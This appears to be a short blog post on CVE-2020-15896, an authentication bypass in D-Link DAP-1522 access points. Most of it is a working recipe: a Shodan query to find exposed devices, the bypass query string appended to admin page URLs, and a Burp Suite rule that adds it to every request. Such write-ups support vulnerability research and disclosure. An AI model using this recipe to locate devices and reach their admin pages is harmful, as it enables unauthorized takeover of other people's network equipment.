CVE-2020-15896 Authentication Bypass D-Link DAP-1522 Wireless N Dualband Access Point

Introduction

CVE-2020-15896 is an authentication bypass vulnerability in D-Link DAP-1522 Wireless N Dualband Access Point with fimware version 1.4x.

Device Identification

Identify vulnerable devices using following Shodan query:

DAP-1522 Ver 1.4?

Shodan Query

Authentication Bypass

View the web pages of the router by appending ?NO_NEED_AUTH=1&AUTH_GROUP=0 to every URL as given below:

http://deviceIP/st_device.php?NO_NEED_AUTH=1&AUTH_GROUP=0

http://deviceIP/adv_acl.php?NO_NEED_AUTH=1&AUTH_GROUP=0

http://deviceIP/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0

Authentication Bypass

Automation Using Burp Suite Proxy Match and Replace

In Burp Suite, Proxy > Options tab, add a Match and Replace rule to replace " HTTP/1.1" with "?NO_NEED_AUTH=1&AUTH_GROUP=0 HTTP1.1"

Burp Suite Match and Replace

From now on, every request in browser will be automatically appended with ?NO_NEED_AUTH=1&AUTH_GROUP=0.

Auto Replace

Video



Comments

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Firmadyne Installation & Emulation of Firmware

Dump memory to file from U-Boot console using Memory Display (md) log